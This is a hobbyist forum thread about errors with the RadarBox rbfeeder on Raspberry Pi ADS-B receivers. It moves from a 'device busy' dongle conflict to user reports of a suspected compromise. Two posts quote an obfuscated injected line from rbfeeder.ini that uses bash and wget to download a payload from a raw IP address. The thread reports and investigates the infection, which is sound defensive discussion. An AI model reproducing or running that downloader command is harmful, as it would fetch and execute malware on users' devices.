RBFeeder multiple errors

Started by fleihoff, June 02, 2025, 06:19:58 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

fleihoff

I have the problem that my RBFeeder has a range of 0

I have this error "Error opening the listening port 32458 (Raw TCP output): bind: Address already in use" and "Process: 3751 ExecStartPre=/bin/mkdir /var/run/rbfeeder (code=exited, status=1/FAILURE)"

and from the status prompt this one " Jun 02 19:14:55 raspberrypi rbfeeder[4172]: rtlsdr: error querying device #0: Permission denied"

Runway 31

Something else has grabbed your receiver, are you feeding to multiple sites

Alan

fleihoff

I installed a fresh image. I used the Bake a Pi guide with the Pi24 image. Now my status page is like this. ● rbfeeder.service - RBFeeder Service
     Loaded: loaded (/lib/systemd/system/rbfeeder.service; enabled; preset: enabled)
     Active: active (running) since Mon 2025-06-02 20:58:07 BST; 3min 44s ago
    Process: 7376 ExecStartPre=/bin/mkdir -p /var/run/rbfeeder (code=exited, status=0/SUCCESS)
    Process: 7377 ExecStartPre=/bin/chown rbfeeder:rbfeeder /var/run/rbfeeder (code=exited, status=0/SUCCESS)
    Process: 7378 ExecStartPre=/bin/touch /var/log/rbfeeder.log (code=exited, status=0/SUCCESS)
    Process: 7379 ExecStartPre=/bin/chown rbfeeder:rbfeeder /var/log/rbfeeder.log (code=exited, status=0/SUCCESS)
    Process: 7380 ExecStartPre=/bin/chown rbfeeder:rbfeeder /etc/rbfeeder.ini (code=exited, status=0/SUCCESS)
    Process: 7381 ExecStartPre=/bin/setfacl -m u:www-data:rwx /etc/rbfeeder.ini (code=exited, status=0/SUCCESS)
   Main PID: 7382 (rbfeeder)
      Tasks: 9 (limit: 765)
        CPU: 8.357s
     CGroup: /system.slice/rbfeeder.service
             └─7382 /usr/bin/rbfeeder

Jun 02 21:01:43 raspberrypi rbfeeder[8017]: usb_claim_interface error -6
Jun 02 21:01:43 raspberrypi rbfeeder[8017]: rtlsdr: error opening the RTLSDR device: Device or resource busy
Jun 02 21:01:46 raspberrypi rbfeeder[8025]: Mon Jun  2 21:01:46 2025 BST  dump1090-rb 1.0.11 starting up.
Jun 02 21:01:46 raspberrypi rbfeeder[8025]: rtlsdr: using device #0: Generic RTL2832U OEM (Realtek, RTL2838UHIDIR, SN 00000001)
Jun 02 21:01:47 raspberrypi rbfeeder[8025]: usb_claim_interface error -6
Jun 02 21:01:47 raspberrypi rbfeeder[8025]: rtlsdr: error opening the RTLSDR device: Device or resource busy
Jun 02 21:01:49 raspberrypi rbfeeder[8035]: Mon Jun  2 21:01:49 2025 BST  dump1090-rb 1.0.11 starting up.
Jun 02 21:01:49 raspberrypi rbfeeder[8035]: rtlsdr: using device #0: Generic RTL2832U OEM (Realtek, RTL2838UHIDIR, SN 00000001)
Jun 02 21:01:49 raspberrypi rbfeeder[8035]: usb_claim_interface error -6
Jun 02 21:01:49 raspberrypi rbfeeder[8035]: rtlsdr: error opening the RTLSDR device: Device or resource busy
e]


Im also feeding FR24, but I followed the guide. Still error -6 for the rtlsdr

Runway 31

#3
Can you post your RB ini file with your key redacted pleas

What you posted advises the stick is already in use when RB feeder tries to use it so the ini file will need to be changed to allow RB access to your stick output.  FR24's dump 1090 will have grabbed it stopping RB's dump 1090 getting access so a small change will be needed to the RB ini file to allow it to use the FR24 dump 1090

Alan

abcd567

The Pi24 image installs dump1090-mutability, which is using the Dongle.
YOu have configured rbfeeder to run rbfeeder's built-in "dump1090-rb". As the dongle is already in use by "dump1090-mutability", it cannot use the dongle, and fails with error message:
usb_claim_interface error -6
rtlsdr: error opening the RTLSDR device: Device or resource busy

This can be fixed by making setting of rbfeeder to use "network", i.e. the external decoder, which in case of Pi24 image is dump1090-mutability.

This can be done easily by editing file rbfeeder.ini

sudo nano /etc/rbfeeder.ini



In this file the first line under [client] will be
network_mode=false

Change it to
network_mode=true

Save file, then restart rbfeeder

sudo systemctl restart rbfeeder


Please see attached screenshots


Shush

I think it's something bigger.
In the last month my Raspberry Pi traffic has increased by 400%
When I started monitoring the traffic, I noticed that it was probably from the radarbox feeder
I have no idea what you did on your end, but it doesn't look good at all.

abcd567

#6
STEP-1:
1.1 - Purge rbfeeder
1.2 - Purge mlat-client
1.3 - Delete file /etc/rbfeeder.ini
1.4 - Reboot  Pi

sudo apt purge rbfeeder 

sudo apt purge mlat-client 

sudo rm /etc/rbfeeder.ini

sudo reboot 


STEP-2:
After purging & rebooting as above, install rbfeeder, after installation, restart it

sudo apt install rbfeeder 

sudo apt install mlat-client 

sudo systemctl restart rbfeeder 



STEP-3:
After restarting rbfeeder, check file /etc/rbfeeder.ini. It should be like given below:
NOTE, by default folloing entries are not there. you will need to enter these manually for MLAT to work (alt is receiver altitude above sea level in meters)

lat=xx.xxxx
lon=yy.yyyy
alt=zzz 




[client]
network_mode=true
log_file=/var/log/rbfeeder.log

key=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

sn=EXTRPI000008

lat=43.5xxx
lon=-79.6xxx
alt=155


[network]
mode=beast
external_port=30005
external_host=127.0.0.1

[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

[dump978]
#dump978_enabled=true

Shush

Thank you very much for the detailed answer.

It was an installation from scratch,
worked 3-4 days, and start getting crazy.

Here is my rbfeeder.ini file

[client]
network_mode=true
log_file=/var/log/rbfeeder.log

key=abcdefghij123456789

sn=EXTRPIxxxxxx

lat=12.34567
lon=12.34567
alt=100

[network]
mode=beast
external_port=30005
external_host=127.0.0.1

[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

[dump978]
#dump978_enabled=false (Not applicable in my area)

But what does the file have to do with the fact that the feeder started working strangely a month ago after it had been working properly for almost two years ?
and by the way, this happened on 3 different RPi devices, which makes me think that something has changed on the server side and it is not my local problem.
I can't understand why it's trying to connect to all sorts of IP addresses that I have no idea where from and why it's trying to connect.

ipinfo.io
api.ipify.org
api64.ipify.org
www.trackip.net
rbdatacollect.com



abcd567

May be it is a virus or malware which has infected all your RPis.
Have you installed some software on your RPis from some unknown source?

Shush

When did you get to monitor your Raspberry Pi's communication?
try it, I'm sure you'll be surprised by the results.
I'm almost certain that no user will notice what's going on behind the scenes on their Raspberry Pi.
I'm almost 100% sure that this is the result of Radarbox feeder.
I've now reinstalled Raspberry Pi with only FR24 feeder, and I continue to monitor the system.

Do you recognize this line that was added to the rbfeeder.ini file?


[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

mlat_cmd=bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://8.211.7.190/e48/a${IF>

[dump978]
#dump978_enabled=false


And by the way, I'm sure it's not a virus because as I wrote, it happened recently on 3 different devices of mine and 2 of my friends who are in different cities.

abcd567

Quote from: Shush on July 18, 2025, 05:07:57 AM
When did you get to monitor your Raspberry Pi's communication?
try it, I'm sure you'll be surprised by the results.
I'm almost certain that no user will notice what's going on behind the scenes on their Raspberry Pi.
I'm almost 100% sure that this is the result of Radarbox feeder.
I've now reinstalled Raspberry Pi with only FR24 feeder, and I continue to monitor the system.

Do you recognize this line that was added to the rbfeeder.ini file?


[mlat]
autostart_mlat=true
#mlat_cmd=/usr/bin/python3.9 /usr/bin/mlat-client

mlat_cmd=bin/bash -c wget${IFS}-O${IFS}/tmp/a${IFS}http://8.211.7.190/e48/a${IF>

[dump978]
#dump978_enabled=false


And by the way, I'm sure it's not a virus because as I wrote, it happened recently on 3 different devices of mine and 2 of my friends who are in different cities.

You are not the only one who has this viral line written under [mlat] in file rbeeder.ini. Please see the recent post in FlightRadar24 linked below
It seems recent version of rbfeeder was onfected with a virus, and anyone who installed rbfeeder using that infected .deb package got the viral line in file rbfeeder.ini under [mlat]


https://forum.flightradar24.com/forum/radar-forums/flightradar24-feeding-data-to-flightradar24/229522-rpi-issues?p=229567#post229567


bishoptf

We need someone from AirNav to weigh in on this, I had this happen to my feeder on Monday...This device has been running for 5+ years and I have not loaded or updated anything on it in almost a year and then I had this issue. If RBfeeder program downloads updates automatically and I believe it does, someone needs to explain what has happened and I am starting to think that I need to wipe my feeder and reload since I have no idea what this code downloaded and was running.

This is a huge failure on AirNav and until someone can explain what happened I have lost all trust in them as a company.

bishoptf

I'm currently running clamav and see if it picks up anything....beyond p'od about this....again @abcd567 how do we get in touch with anyone at AirNav Systems?

abcd567

Quote from: bishoptf on July 18, 2025, 12:40:41 PM
@abcd567 how do we get in touch with anyone at AirNav Systems?

Send email to support:
[email protected]


Runway 31

I have passed details of this thread on to Developers

Alan